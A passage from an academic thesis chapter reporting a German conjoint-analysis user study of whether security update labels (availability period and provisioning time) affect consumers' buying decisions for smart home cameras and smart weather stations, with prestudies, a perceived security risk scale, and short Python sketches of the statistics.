Although the concept of security update labels seems to be reasonable, there is no evidence of their acceptance by consumers. To investigate this issue, we conducted a user study with the objective to assess whether mandatory security update labels have the potential to be an important criterion in consumer decision making when buying an IoT product. If security update labels turn out to be important for consumers’ buying decisions, this would create economic incentives for manufacturers to guarantee the timely patching of security vulnerabilities in their IoT products. We consider the following research questions:

• RQ1: What is the relative importance of the availability period and provisioning time for security updates for buying decisions compared to other product attributes?

• RQ2: Are there differences in the relative importance of the availability period and provisioning time for security updates between products with a high perceived security risk compared to products with a low perceived security risk?

• RQ3: Are there differences in the relative importance of the availability and pro- visioning time for security updates according to demographic characteristics of the consumers?

• RQ4: Are there differences in the relative importance of the availability and provi- sioning time for security updates depending on security behavior intentions, privacy concerns, and security risk perception of the consumers?


Figure 7.2: Structure of the user study.

In the following, we investigate these research questions for German consumers. Germany has the largest consumer market within the EU, and the fourth largest consumer market worldwide after the USA, China, and Japan [313].

Structure of the User Study. We utilize conjoint analysis, as this method is well suited for our objectives (cf. Section 7.2.3): We aim to determine the influence of the availability period and provisioning time attributes on consumers' choices. This includes whether these attributes are desired at all (i.e., do consumers care about the availability of security updates?), and which attribute levels are more attractive (i.e., do consumers favor short provisioning time or long availability periods?). To answer the research questions, we needed to choose product categories that differ in the perceived security risk. We decided on two product categories as this number is sufficient to answer the research questions: one with a high perceived security risk as well as one with a low perceived security risk. The user study followed a three-stage approach as shown in Figure 7.2: In the first stage (Prestudy 1), two suitable product categories were selected. In the second stage (Prestudy 2), we determined the most important product attributes and their levels for each of the two product categories. In the third stage (Conjoint Analysis), we assessed the consumers' preferences (RQ1), comparing the attributes of the security update label with other important product attributes. Finally, we validated the preference model, compared the product categories (RQ2), and performed a segmentation analysis (RQ3, RQ4).

Ethics and Recruitment. The study design was approved by the data protection office of the authors' institution. All survey answers were associated with pseudonyms that did not provide any information about the identity of the respondents. All data was processed in accordance with the German data protection laws. The online surveys were hosted on a web server that is provided by the authors' institution, and secured such that only authorized entities have access to the collected data. The respondents for the online surveys were recruited on an online crowdworker platform, as prior work showed that such samples are appropriate for security research [242]. We used the Clickworker platform [49], which claims to have the largest crowd of German-speaking workers. For all online surveys, we pre-selected the respondents with the following characteristics: all genders, age between 18 and 65, and Germany as country of residence. The crowdworkers were paid according to the German minimum wage of €8.84 per hour.

Translation of Psychometric Scales. As we ran our surveys with German-speaking respondents, we translated all items of the English psychometric scales we utilized. These scales are used to measure, e.g., the respondents' privacy concerns [64] or security behavior intentions [259]. To ensure a reliable translation, we utilized a methodology proposed by Venkatesh et al. [299]. Three bilingual domain experts translated the English scales into German individually. In a second step, these experts compared their translations, discussed differences, and agreed on a single final version. Finally, three bilingual speakers (one English native speaker, a professional translation service, and a German native speaker who lived for several years in the UK) retranslated the German scales back into the original language. Through verifying that the original scales matched the retranslated scales semantically, the translation was considered successful.

Statistical Data Analysis. We denote by µ the mean value, and by σ the standard deviation. To assess the practical meaning of the statistical results, we report effect sizes [51]: For unpaired t-tests, an absolute value of d < 0.5 is considered a small, d between 0.5 and 0.8 a medium, and d > 0.8 a large effect. For paired t-tests, the effect size dz is interpreted identically to d. Cramér's V measures effect sizes for χ² tests, and r for ANOVA1. Values around 0.10 indicate a small, 0.30 a medium, and 0.50 a large effect [94].
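The following sketch spells out how the effect size measures mentioned above are typically computed (Cohen's d with a pooled standard deviation, dz from paired differences, Cramér's V from the χ² statistic); the sample values are invented for illustration only and are not data from this study.

# Minimal sketch of the effect size computations, with made-up example values.
import numpy as np
from scipy.stats import chi2_contingency

def cohens_d(x, y):
    # Unpaired Cohen's d with pooled standard deviation.
    nx, ny = len(x), len(y)
    pooled = np.sqrt(((nx - 1) * np.var(x, ddof=1) + (ny - 1) * np.var(y, ddof=1))
                     / (nx + ny - 2))
    return (np.mean(x) - np.mean(y)) / pooled

def cohens_dz(x, y):
    # Paired effect size: mean of the differences over their standard deviation.
    diff = np.asarray(x) - np.asarray(y)
    return np.mean(diff) / np.std(diff, ddof=1)

def cramers_v(table):
    # Cramér's V derived from the chi-squared statistic of a contingency table.
    chi2, _, _, _ = chi2_contingency(table)
    n = np.asarray(table).sum()
    k = min(np.asarray(table).shape) - 1
    return np.sqrt(chi2 / (n * k))

a = np.array([5.5, 5.0, 6.1, 4.8, 5.9])  # illustrative ratings, category A
b = np.array([3.1, 2.9, 3.4, 3.0, 3.6])  # illustrative ratings, category B
print(cohens_d(a, b), cohens_dz(a, b))
print(cramers_v([[20, 10], [12, 18]]))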

7.5 Preliminary Studies

7.5.1 Prestudy 1: Selection of Product Categories

The objective of this prestudy is to identify two categories of IoT products according to the following criteria:

(C1) Both categories should differ significantly in their perceived security risk.

1 r denotes effect size for one-way independent ANOVA according to Field [94, p. 472] and is calculated as √η².


(C2) Both categories should be similar concerning other central product attitudes and their purchase intentions: Attitude towards product category (in terms of favor, likability, pleasure) [193], involvement with product category (in terms of, e.g., fascination, excitement) [197], consumption motive (hedonistic or utilitarian) [305], desirability to possess products of this product category [173], and purchase intention for products of this product category [191]. The items of these scales are reported in [211, Appendix A].

Perceived Security Risk Scale. To distinguish between product categories with a high and a low perceived security risk (criterion C1), we needed a scale that measures the perceived security risk associated with IoT consumer products. After an extensive literature review, we concluded that there is no scale that sufficiently fits our purpose. Rejected candidates [83, 64, 188] comprised scales that measure security and privacy risks in e-commerce settings. However, because IoT products may have adverse effects on the physical world, their security risks are fundamentally different. Thus, we developed a perceived security risk scale for IoT consumer products using a similar methodology as proposed by Davis [58]. In the first step, we defined the concept of the perceived security risk in IoT products. Perceived risk is defined as the customers' perceptions of uncertainty and unfavorable consequences concerning a product or a service [165]. In the context of security, uncertainty means the probability of a security incident, while consequences are the loss caused by such an incident. We decided to measure only consequences with our scale. We think that it is very difficult for non-experts to determine the probability of a security incident associated with a particular IoT product category, because they would need to assess the quality of the product's security measures as well as the attractiveness of the product for attackers. On the other hand, the assessment of the consequences of a security incident requires knowledge about the deployment and utilization of the product. Usage scenarios are known to consumers, and therefore, they can imagine potential consequences. As a result, we defined that a perceived security risk for an IoT product exists if security vulnerabilities in this product are perceived to lead to negative consequences for the user. We further considered classical risk categories for product purchase by Jacoby and Kaplan [141], which have often been used to measure perceived risk in marketing research [52, 165]. Additionally, we adapted risk categories by Featherman and Pavlou [83], who already adapted Jacoby and Kaplan's categories for e-commerce settings. We split the perceived security risk into four risk categories: 'general'2, 'privacy', 'physical', and 'financial'. Jacoby and Kaplan [141] and Featherman and Pavlou [83] present further risk categories that we did not consider because they have low relevance for the security risk of IoT products: 'performance', 'time', 'psychological', and 'social'. Although the performance of IoT products can be affected in a security incident, performance deficiencies that affect functionality in a dangerous way are already covered by the physical risk. The risk of wasting time in case of a security incident exists for all product categories alike. We excluded psychological risk as its original definition relates to the consumer's self-image or self-concept regarding a product [141]3. Effects of IoT products on consumers' psychological state (e.g., perception of surveillance, or privacy violations) are considered in our scale by items in the risk categories 'privacy' and 'general'. Finally, we did not take social risk into account since privacy risk already covers effects on the status in one's social groups. Item candidates were generated and iteratively improved through expert reviews by 14 experts from the domains of cybersecurity, psychology, and marketing research. The final scale is presented in Table 7.1 and consists of 13 items relating to the risk categories 'general', 'privacy', 'physical', and 'financial'. For the statistical comparison of the product categories, we averaged the scale to form a composite index.

2 Jacoby and Kaplan [141] denote this risk category as 'overall'. We renamed it to 'general' since 'overall' could be misunderstood as an average score over all risk categories.

3 Definition of psychological risk [141]: "the chances that an unfamiliar brand of [product] will not fit in well with your self-image or self-concept."

Table 7.1: Perceived security risk scale (translated to English)

If a third party takes unauthorized control over [product], there is a high risk that...

General
  1. ...the consequences are severe.
  2. ...it leads to high potential of abuse.
  3. ...it is used for criminal purposes.
  4. ...a serious security threat exists.

Privacy
  5. ...this has a serious impact on privacy.
  6. ...they access personal information.
  7. ...it steals private data.

Physical
  8. ...the health of its owners or other people is at risk.
  9. ...the safety of its owners or other people is at risk.
  10. ...it has harmful consequences to the physical integrity of its owner or other people.

Financial
  11. ...the owner suffers financial losses.
  12. ...it is misused for crimes involving financial loss.
  13. ...it leads to financial loss.

Items measured on a 7-point Likert scale ranging from 1 = 'strongly disagree' to 7 = 'strongly agree'.

Survey Structure and Data Collection. We selected eight candidate product categories through an overview of popular IoT consumer products on online shopping websites and expert judgment: smart alarm systems, smart door locks, smart light bulbs, smart home cameras, smart smoke detectors, smart thermostats, smart vacuum robots, and smart weather stations. In the surveys, the products were introduced in a randomized order. Each product category was introduced with an exemplary product picture and a short text that explained the product's features and usage scenarios. We emphasized that all these products connect to the Internet. To determine the sample size for this prestudy, we performed a power analysis [82] for paired t-tests. Assuming that large effects indicate practical relevance (Cohen's dz = 0.8), and a desired power of 0.99, the power analysis determined 30 participants as sufficient. We collected data with an online questionnaire using LimeSurvey [180]. The questionnaire was pretested by six experienced colleagues at our institutes. During the tests, we realized that the amount of data that we wanted to collect would lead to a long and exhausting survey. Therefore, we decided to split the survey into two smaller questionnaires that were answered by two independent groups of respondents. One group rated the perceived security risk (C1) for all eight product categories, while the other group evaluated the scales of C2 for all eight product categories. Each group consisted of 30 crowdworkers. Through test runs, we estimated the average time to answer the surveys to be 10 to 12 minutes. We paid each crowdworker €1.80 for 12 minutes.
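The sample size calculation can be reproduced along the following lines; note that a two-sided test at α = 0.05 is our assumption here, as the text does not state the significance level explicitly.

# Sketch of the a priori power analysis for a paired t-test (dz = 0.8, power = 0.99).
import math
from statsmodels.stats.power import TTestPower

analysis = TTestPower()  # power solver for one-sample / paired t-tests
n = analysis.solve_power(effect_size=0.8, alpha=0.05, power=0.99,
                         alternative="two-sided")
print(math.ceil(n))  # about 30, in line with the sample size reported above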

Results. Sixty respondents (23 female, 37 male) aged between 19 and 62 years (µ = 38.5, σ = 10.7) answered the surveys. We did not exclude any responses. The collected data was analyzed using IBM SPSS [94]. The perceived security risk scale (C1) showed good statistical properties, which are not presented here for brevity; in [211, Appendix B], we present the statistical properties of the scale using the results of the main studies (Section 7.6) with 731 and 735 participants. For all scales of C2, Cronbach's alpha, a measure of the internal consistency of a scale, was above the recommended threshold of .700 (>.858) [94]. The scores of the C1 and C2 scales are presented in Table 7.2. According to our criteria, we found three candidate pairs of product categories that do not differ statistically significantly from each other in the factors of C2, but differ statistically significantly in the perceived security risk:

1. Smart home camera and smart weather station (t(29) = 7.57, p < 0.001, dz = 1.383)

2. Smart smoke detector and smart thermostat (t(29) = 2.09, p < 0.05, dz = 0.381)

3. Smart smoke detector and smart vacuum robot (t(29) = 3.29, p < 0.01, dz = 0.600)


Table 7.2: Mean µ and standard deviation σ from Prestudy 1 (n = 30), sorted by perceived security risk. Columns in order: Perceived Security Risk, Attitude, Consumption Motive, Purchase Intention, Involvement, Desirability.

Smart Alarm System:     µ 5.76, 4.77, 1.74, 3.37, 4.26, 3.90;  σ 1.33, 1.17, 1.01, 1.57, 1.13, 1.47
Smart Door Lock:        µ 5.65, 3.16, 2.42, 2.39, 3.22, 2.70;  σ 1.63, 1.38, 1.43, 1.55, 1.28, 1.34
Smart Home Camera:      µ 5.49, 3.86, 3.44, 3.02, 3.56, 3.57;  σ 1.41, 1.82, 1.73, 1.60, 1.41, 1.59
Smart Smoke Detector:   µ 4.12, 5.16, 1.74, 4.27, 4.52, 4.27;  σ 1.55, 1.34, 1.03, 1.79, 1.30, 1.55
Smart Thermostat:       µ 3.67, 5.24, 1.72, 4.52, 4.52, 4.67;  σ 1.61, 1.38, 0.97, 1.69, 1.20, 1.27
Smart Light Bulb:       µ 3.40, 3.90, 4.39, 3.24, 3.31, 3.33;  σ 1.45, 1.48, 1.63, 1.61, 1.41, 1.56
Smart Vacuum Robot:     µ 3.10, 4.76, 2.30, 4.08, 4.12, 3.97;  σ 1.67, 1.84, 1.38, 2.09, 1.54, 1.87
Smart Weather Station:  µ 2.98, 4.38, 2.90, 3.51, 3.75, 3.67;  σ 1.51, 1.83, 1.47, 1.87, 1.63, 1.69

We decided on the first pair as these product categories have the highest difference between their perceived security risk scores.

7.5.2 Prestudy 2: Definition of Product Attributes and Levels

After the two product categories were chosen, the next step was to determine the product attributes that would be used in the conjoint analysis. The number of attributes should be reasonable such that a respondent can process them cognitively [111]. Otherwise, respondents might tend to use shortcut heuristics that ignore less important features [72]. We decided on 7 attributes per product category. Two attributes were reserved for the attributes of the security update label (availability period and provisioning time). The remaining five attributes comprised existing product attributes that depend on the product category. We paid attention to avoid correlation between attributes, which would lead to illogical profiles. In the literature on conjoint analysis, the specification of attributes lacks a golden standard [186] and is approached in various ways, such as focus groups, surveys, or expert judgements.

Method. We conducted an online survey to identify the most important attributes for each product category to use in the conjoint analysis. For this, attribute candidates were collected from online shopping websites. We prepared an online questionnaire on LimeSurvey that listed these 18 individual attributes, which are given in Table 7.3. Respondents rated the importance of these attributes for their buying decision using the dual-questioning methodology by Alpert [8, 302]. The respondents rated the following two items on 7-point Likert scales: "How important is each of these attributes in your buying decision?" and "How much difference do you feel there is among products of the product category '[product]' in each of these attributes?". Both scores were multiplied to get an overall score for each product attribute. The higher the overall score, the more important the attribute.
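The scoring itself is a simple per-respondent product of the two ratings, averaged over respondents; the following tiny sketch illustrates it with invented example ratings for a single attribute (the respondent identifiers and values are not data from the study).

# Dual-questioning score for one attribute: importance rating x perceived-difference rating.
import statistics

ratings = {"r1": (7, 6), "r2": (6, 5), "r3": (5, 6)}  # respondent -> (importance, difference)

scores = [importance * difference for importance, difference in ratings.values()]
print(statistics.mean(scores), statistics.stdev(scores))  # mean and standard deviation of the scores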

Data Collection. We recruited 30 crowdworkers for this preliminary survey who were each paid €0.75 (reward equivalent for 5 minutes). In the screening of the collected data, we found that one participant clicked the middle option for almost all attributes and was six times faster than the average participant. This person was excluded from the evaluation [21].

Results. The final set of participants consisted of 29 respondents (18 female, 11 male) aged between 20 and 63 years (µ = 35.3, σ = 11.5). The results of the dual-questioning method are reported in Table 7.3. In summary, the product attributes that were perceived as most important for smart home cameras were price, resolution, field of vision, frame rate, and zoom function. For smart weather stations, the most important product attributes were price, battery lifetime, precision, rain and wind sensor, and expandability for multiple rooms. In Table 7.3, 'solar panel for energy generation' is listed as the second most important product attribute for smart weather stations. However, in line with prior research [128], we refrained from using this attribute because it correlates with 'battery lifetime', and correlated attributes bear the risk of threatening the study's validity. We decided to include 'battery lifetime' as nearly all smart weather stations use batteries, while solar panels are only a rare feature in this product category. In addition to these attributes, we added the availability and provisioning time of security updates introduced in Section 7.3.2. The final list of attributes is shown in Table 7.4.

Attribute Levels. For each attribute, a discrete number of levels had to be specified. The number of attribute levels should be as low as possible and need not cover the full feature range of the attribute. As recommended [264], we defined two to four levels to keep the complexity of the conjoint analysis low.


Table 7.3: Considered product attributes (n = 29) and their dual-questioning scores (higher score values indicate a higher perceived importance of this attribute).

Smart Home Camera
Rank  Product Attribute                          µ      σ
1.    Price                                      30.59  12.69
2.    Video resolution                           26.79  12.22
3.    Field of view                              26.17  11.60
4.    Video frame rate                           24.41  11.21
5.    Zoom function                              23.10  11.85
6.    Energy consumption                         22.59  10.53
7.    Face recognition                           22.10  12.19
8.    Night vision mode                          21.79   9.60
9.    Timing function for recordings             20.86   9.16
10.   Type of power supply                       19.24   8.59
11.   Brand/manufacturer                         18.48  11.92
12.   Seal of technical approval                 18.48  12.21
13.   Material of encasement                     18.41  10.62
14.   Environmental label                        17.38  11.68
15.   SD card slot                               17.21   9.69
16.   Color of product                           14.52  10.21
17.   Accessibility label (fictive)              14.14   8.73
18.   Alexa compatible                           11.21   9.19

Smart Weather Station
Rank  Product Attribute                          µ      σ
1.    Price                                      31.76  12.83
2.    Solar panel for energy generation          26.66  12.01
3.    Battery lifetime                           26.31  11.33
4.    Precision level of measurements            23.72  10.98
5.    Rain and wind measurements                 23.69  10.99
6.    Expandability for multiple rooms           23.48  13.06
7.    Max. wireless range                        23.34  10.17
8.    Warning feature (e.g., storm)              22.66  10.59
9.    How many days of local weather forecast    22.14   8.80
10.   Measurement rate                           19.14  10.15
11.   Brand/manufacturer                         18.28  10.12
12.   Alarm upon preset threshold exceedance     18.03  10.69
13.   Seal of technical approval                 17.76  10.14
14.   Environmental label                        17.14  12.23
15.   Material of casing                         16.62  10.45
16.   Color of product                           16.03  11.69
17.   Alexa compatible                           12.34   9.93
18.   Accessibility label (fictive)              11.17   6.70


Table 7.4: Product categories with their respective attributes and attribute levels.

Smart home camera
1  Price                                €100, €120, €140, €160
2  Resolution                           HD, Full-HD
3  Field of vision                      110°, 130°, 150°
4  Frame rate                           25 fps, 30 fps, 50 fps
5  Zoom function                        yes, no
6  Availability of security updates     none, until 12/2020 (2 years), until 12/2024 (6 years)
7  Provisioning time for sec. updates   none, within 10 days, within 30 days

Smart weather station
1  Price                                €100, €120, €140, €160
2  Battery lifetime                     1 year, 2 years, 3 years
3  Precision                            ±0.2°C, ±0.3°C, ±0.5°C
4  Rain/wind sensor                     yes, no
5  Expandability to multiple rooms      yes, no
6  Availability of security updates     none, until 12/2020 (2 years), until 12/2024 (6 years)
7  Provisioning time for sec. updates   none, within 10 days, within 30 days

Similarly to the specification of the attributes, there is no gold standard for defining the attribute levels. We decided to specify the levels with reasonable values that we acquired by examining the most popular products of both product categories available on Amazon as of October 2018. Thereby, we took care to avoid the specification of extreme values that would be considered outliers. We considered price levels within the realistic price ranges on the market. We found smart home cameras by 13 manufacturers with prices between €50 and €179 (around €110 on average), and smart weather stations by 10 manufacturers in the range between €54 and €176 (around €129 on average). To enhance comparability, we defined the same price levels for both product categories. Furthermore, we decided not to use prices below €100, as the threshold between a two-figure and a three-figure price might bias the importance of the price attribute considerably towards two-figure prices. Also, we consistently used 0-ending prices [286, 23] and finally chose four equally spaced price levels between €100 and €160. For all further product attributes, we chose two to three levels that reflect the attribute span of products on the market. All attributes and their levels are summarized in Table 7.4.

Focus Group. As the attributes of the security update label are unknown to consumers, we ran a focus group to obtain an intuitive description of the security update label’s attributes and their levels. The focus group consisted of 8 participants (5 female and 3 male) aged between 19 and 54 years (µ = 33.5, σ = 12.9) without a professional cybersecurity background. Two participants had a professional IT background; we therefore paid attention that these two participants did not dominate the discussion. We rewarded each participant with €10 for a one-hour session. We started the focus group by establishing the participants’ prior experience with IoT consumer products, their awareness of security problems in these products, as well as their experience with security updates in general. Then, we introduced the idea of the security update labels and asked the participants to write down how they would explain the attributes to family and friends. Each participant presented their explanations and we discussed them with the group.

Based on the focus group discussion, we presented the availability period in the conjoint analysis survey as ‘availability of security updates’ (German: ‘Verfügbarkeit von Sicherheitsupdates’) with a fixed end date, e.g., ‘until 12/2020’, and with the relative period of time until this date (e.g., ‘2 years’) to reduce the cognitive effort for the respondents. Although the relative period is not part of the proposed label, the reduction of cognitive load was important because the respondents would compare availability attributes in 10 choice tasks. The levels of the availability attribute were chosen to reflect realistic conditions: There is always a level of non-availability (i.e., the manufacturer does not guarantee security updates), a level similar to the usual warranty period of this class of products (i.e., 2 years), and a third level that exceeds the usual warranty period and is oriented more towards the realistic lifetime of the product (i.e., 6 years).

The provisioning time attribute was defined to reflect non-availability, a rather fast (and ideal) period of 10 days, and a slower (and more realistic) period of 30 days. We denoted the provisioning time attribute in the survey as ‘provision time of security updates’ (German: ‘Bereitstellungszeit von Sicherheitsupdates’). To exclude confusing profiles that arise from certain combinations of availability and provisioning time, e.g., the manufacturer does not provide security updates but offers a provisioning time of 30 days, we only allowed meaningful combinations of both attributes.
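The constraint on the two label attributes can be sketched as follows. This is one plausible encoding of the rule described above (either both attributes promise nothing, or both promise something); the exact filtering used in the survey tool may differ.

```python
# Sketch: keep only meaningful availability/provisioning-time combinations.
from itertools import product

availability = ["none", "until 12/2020 (2 years)", "until 12/2024 (6 years)"]
provisioning = ["none", "within 10 days", "within 30 days"]

def is_meaningful(avail: str, prov: str) -> bool:
    # Both "none" or both a concrete guarantee; never a mixed promise.
    return (avail == "none") == (prov == "none")

valid_pairs = [(a, p) for a, p in product(availability, provisioning) if is_meaningful(a, p)]
print(valid_pairs)   # 5 of the 9 possible combinations remain
```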

7.6 Conjoint Analysis

We decided on a choice-based conjoint (CBC) analysis, as this variant is the de-facto conjoint data collection standard in marketing research [262] (cf. Section 7.2.3). Although CBC’s data collection is considered less efficient than other conjoint data collection methods, it provides a better predictor of real-world in-market behavior [237]. Furthermore, it allows a “no choice” option, which also contributes valuable information, namely that none of the presented options is attractive.

7.6.1 Method

We used Lighthouse Studio by Sawtooth Software [262] for survey setup and data analysis. Lighthouse Studio is a well-established and validated tool for conjoint analysis [218, 203].


To avoid fatigue, each respondent evaluated only one of the two product categories; the product category was assigned randomly. Upon starting the survey, general information about the context, the privacy of collected data, and the scope of the survey was presented. The respondents expected a survey about a smart home product. Then, the particular product category was introduced with a short explanation of its features and exemplary product pictures. We asked whether the respondent was familiar with this product category and whether she owned such a product.

In line with previous research [132, 279], we explained all attributes shown in Table 7.4 (except price) with a short description, to improve comprehension and prevent misunderstandings. To validate comprehension, the respondent answered a quiz that included a question for each attribute. For example, for the availability attribute, we asked “What does the availability of security updates specify?” with the possible answers: (a) “for how long the manufacturer guarantees to provide security updates”, (b) “for how long the device is allowed to be used”, (c) “for how long the device guarantees to be protected against hacker attacks”. While the first answer was correct in this example, the order of possible answers was randomly permuted in the questionnaire. If the respondent chose a wrong answer, the correct answer was explained again. Also, the quiz did not follow the order in which the attributes had been presented before, in order to rule out learning effects.

After the respondent became familiar with the attributes, the choice tasks for the conjoint analysis were explained: The respondent is presented with four product profiles and has to decide on the most attractive option. All product profiles are described by an attribute level for each product attribute (including the security update label attributes) in plain text. In addition to the set of product alternatives, there is always a “no choice” option that can be chosen in case none of the four profiles is desirable. An exemplary choice task is depicted in Figure 7.3. Each respondent then performed ten choice tasks: eight randomly generated tasks, which were individual for each respondent, and two fixed holdout tasks, which were identical for all respondents. The fixed holdout tasks were later used to validate the attribute preference model. This model is based on the eight randomly generated tasks and should be similar to the model based on the holdout tasks in order to ensure internal consistency of the conjoint analysis (Section 7.6.6). The respondents were not aware whether a choice task was randomly generated or fixed. Prior research [280] concluded that the order of the attributes affects choice behavior. Therefore, we randomly permuted the order of all 7 attributes for each respondent but kept the same order for a particular respondent, as changing it might otherwise be confusing.

After the respondents performed the choice tasks, we measured the perceived security risk for the particular product category using the perceived security risk scale from Section 7.5.1. We also used psychometric scales to measure the respondents’ privacy concerns with the Internet [64] as well as their security behavior intentions [259]. Next, we included control questions to assess whether the respondents had difficulties understanding the survey, had been distracted, and whether they took the choice tasks seriously.
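The structure of a randomly generated choice task can be sketched as follows. The attribute names and levels follow Table 7.4, but the sampling logic is purely illustrative; it is not the balanced design algorithm that Lighthouse Studio uses to generate the actual tasks.

```python
# Sketch: assemble one choice task (four full profiles plus a "no choice" option).
import random

CAMERA_ATTRIBUTES = {
    "Price": ["€100", "€120", "€140", "€160"],
    "Resolution": ["HD", "Full-HD"],
    "Field of vision": ["110°", "130°", "150°"],
    "Frame rate": ["25 fps", "30 fps", "50 fps"],
    "Zoom function": ["yes", "no"],
    "Availability of security updates": ["none", "until 12/2020 (2 years)", "until 12/2024 (6 years)"],
    "Provisioning time for sec. updates": ["none", "within 10 days", "within 30 days"],
}

def random_profile(attributes, order):
    profile = {name: random.choice(attributes[name]) for name in order}
    # Re-draw profiles with illogical security-update combinations (Section 7.5.2).
    if (profile["Availability of security updates"] == "none") != (
        profile["Provisioning time for sec. updates"] == "none"
    ):
        return random_profile(attributes, order)
    return profile

def choice_task(attributes, order):
    return [random_profile(attributes, order) for _ in range(4)] + ["no choice"]

# The attribute order is permuted once per respondent and then kept fixed.
respondent_order = list(CAMERA_ATTRIBUTES)
random.shuffle(respondent_order)
tasks = [choice_task(CAMERA_ATTRIBUTES, respondent_order) for _ in range(8)]
print(tasks[0])
```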


Figure 7.3: Screenshot of a choice task in the conjoint questionnaire (translated to English).

These questions were used to identify unmotivated respondents, whom we later excluded from the analysis. Finally, we collected demographic data: gender, year of birth, vocational qualification, professional IT background, and net income. This data was used to determine the representativeness of the sample as well as for the segmentation. To ensure that the respondents stayed focused, we included a number of motivational statements in the questionnaire.

7.6.2 Pilot Study

The questionnaire was developed in multiple iterative rounds. After completing the final draft, we collected feedback from seven experts from academic and market research institutes. We asked whether they understood the attributes and tasks, and whether anything could be misleading. Based on their feedback, we re-worded some instructions. Finally, we tested the questionnaire with 60 crowdworkers to check that it worked as expected and to calculate the average task completion time needed to determine the compensation.


7.6.3 Sample Size

The sample size, i.e., the number of respondents for our questionnaire, was chosen as a trade-off between increasing costs and decreasing sampling errors. Sampling error arises if the sample of respondents does not represent the population. Practical guidelines [226] on CBC analyses recommend at least 300 respondents for studies without segmentation. If a segmentation analysis is desired, as is the case in our study, then a minimum of 200 respondents per subgroup is advised. Since we aimed for a comparison of up to three subgroups, which is a usual configuration in a segmentation analysis, we decided to recruit around 800 respondents for each product category, and thus 1,600 respondents in total. In the pilot study, the average time to answer the questionnaire was 8 minutes; we therefore paid crowdworkers €1.20. We ensured that respondents of the prestudies could not participate in the main survey.

7.6.4 Sample Characteristics

We collected the data within a week in mid-December 2018. After screening, we excluded 154 (9.5%) of the 1,620 collected data sets: 70 data sets due to low task completion times (less than half of the pilot study’s average time), 48 data sets due to indications in the control questions, 19 data sets due to suspected multi-participation (same IP address and user agent), 16 data sets in which more than two quiz questions were answered incorrectly, and 3 data sets of respondents under 18 years. The final sample comprised 1,466 data sets (640 female, 805 male) aged between 18 and 65 years (µ = 33.8, σ = 11.2). Details of the demographic data are presented in Table 7.5. In comparison to the German population, the sample is biased towards males and highly educated persons. Furthermore, people aged 50 and above are underrepresented in this sample. However, the sample aligns with the target group of consumers interested in IoT consumer products, which is likewise biased towards males, the age group 25-34, and higher incomes [278].
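The screening rules can be expressed compactly as a filter over the collected response records. The record fields below are made-up names for illustration; only the thresholds follow the description above.

```python
# Sketch of the data-screening rules applied to hypothetical response records.
PILOT_AVG_SECONDS = 8 * 60   # average completion time from the pilot study

def keep(record, seen_fingerprints):
    fingerprint = (record["ip"], record["user_agent"])
    if record["seconds"] < PILOT_AVG_SECONDS / 2:        # too fast
        return False
    if record["failed_control_questions"]:               # control-question indications
        return False
    if fingerprint in seen_fingerprints:                  # suspected multi-participation
        return False
    if record["wrong_quiz_answers"] > 2:                  # more than two quiz questions wrong
        return False
    if record["age"] < 18:                                # under-age respondents
        return False
    seen_fingerprints.add(fingerprint)
    return True

responses = [
    {"ip": "10.0.0.1", "user_agent": "UA1", "seconds": 510,
     "failed_control_questions": False, "wrong_quiz_answers": 0, "age": 25},
    {"ip": "10.0.0.2", "user_agent": "UA2", "seconds": 150,
     "failed_control_questions": False, "wrong_quiz_answers": 1, "age": 31},  # excluded: too fast
]
seen = set()
clean = [r for r in responses if keep(r, seen)]
print(len(clean))
```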

7.6.5 Results

In total, 731 respondents evaluated the product category ‘smart home camera’ and 735 respondents assessed the product category ‘smart weather station’. The large difference in security risk perception between the two product categories was confirmed: While the smart weather station achieved an average perceived security risk score of 3.65, the smart home camera achieved an average score of 5.50. This difference is highly statistically significant with a large effect size: t(1464) = 28.42, p < 0.001, d = 1.48. Cronbach’s alpha for all psychometric scales was above the recommended threshold of .700 (> .837) [94]. For the analysis of the collected conjoint data from the randomly generated choice tasks, we used hierarchical Bayes estimation with default settings, as recommended [262].
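The reported group comparison corresponds to an independent t-test with pooled variance (df = 731 + 735 − 2 = 1464) and Cohen’s d based on the pooled standard deviation. The following sketch shows the computation on simulated stand-in scores; the actual values in the thesis come from the 7-point risk-scale responses, which are not reproduced here.

```python
# Sketch: pooled independent t-test and Cohen's d on simulated risk scores.
import numpy as np
from scipy import stats

camera_scores = np.random.default_rng(0).normal(5.50, 1.2, 731)    # hypothetical data
weather_scores = np.random.default_rng(1).normal(3.65, 1.3, 735)   # hypothetical data

t, p = stats.ttest_ind(camera_scores, weather_scores, equal_var=True)

def cohens_d(a, b):
    na, nb = len(a), len(b)
    pooled_var = ((na - 1) * a.var(ddof=1) + (nb - 1) * b.var(ddof=1)) / (na + nb - 2)
    return (a.mean() - b.mean()) / np.sqrt(pooled_var)

df = len(camera_scores) + len(weather_scores) - 2
print(f"t({df}) = {t:.2f}, p = {p:.3g}, d = {cohens_d(camera_scores, weather_scores):.2f}")
```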


Table 7.5: Demographic data of the sample compared with the German population.

                                                      Sample            Population
All                                                    1,466
Gender                      female                       640    44.0%    49.8% (a)
                            male                         805    55.3%    50.2% (a)
                            3rd option                    10     0.7%
Age (in years)              18-24                        339    23.1%    12.9% (a)
                            25-29                        288    19.6%     9.6% (a)
                            30-49                        432    29.5%    18.8% (a)
                            50-64                        404    27.5%    58.7% (a)
Vocational qualification    none                         156    10.6%    22.8% (a)
                            vocational-oriented          582    39.7%    60.2% (a)
                            academic                     728    49.7%    17.0% (a)
Monthly net income (in €)   none                          52     4.3%    17.9% (b)
                            less than 900                288    23.5%    24.3% (b)
                            900 to 1,500                 296    24.2%    22.7% (b)
                            1,500 to 2,600               377    30.8%    22.4% (b)
                            more than 2,600              210    17.2%    10.2% (b)
Professional IT background  yes                          249    17.6%
                            no                         1,166    82.4%

(a) Census 2011 (age 18-65) [86], (b) Mikrozensus 2014 (all ages) [87]. Missing answers are ignored for percent proportioning.

Using this estimation method, we determined the average relative importance of each product attribute as well as the part-worth utility of each attribute level, based on a total of 5,848 (home camera) and 5,880 (weather station) choice tasks. The relative importance of an attribute defines its relative impact (measured in percent) on the overall choice. The importances are ratio data, meaning that an attribute with an importance of 20% is twice as important as an attribute with an importance of 10% [225].
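A common way to derive relative importances from zero-centered part-worth utilities is to divide each attribute’s utility range by the sum of all ranges, typically per respondent and then averaged. The sketch below illustrates this on a small, illustrative subset of utilities loosely based on Table 7.7; because most attributes are omitted and no per-respondent averaging takes place, it does not reproduce the values in Table 7.6.

```python
# Sketch: relative importance as utility range divided by the sum of ranges.
part_worths = {
    "Price": {"€100": 33.6, "€120": 19.5, "€140": -5.7, "€160": -47.4},
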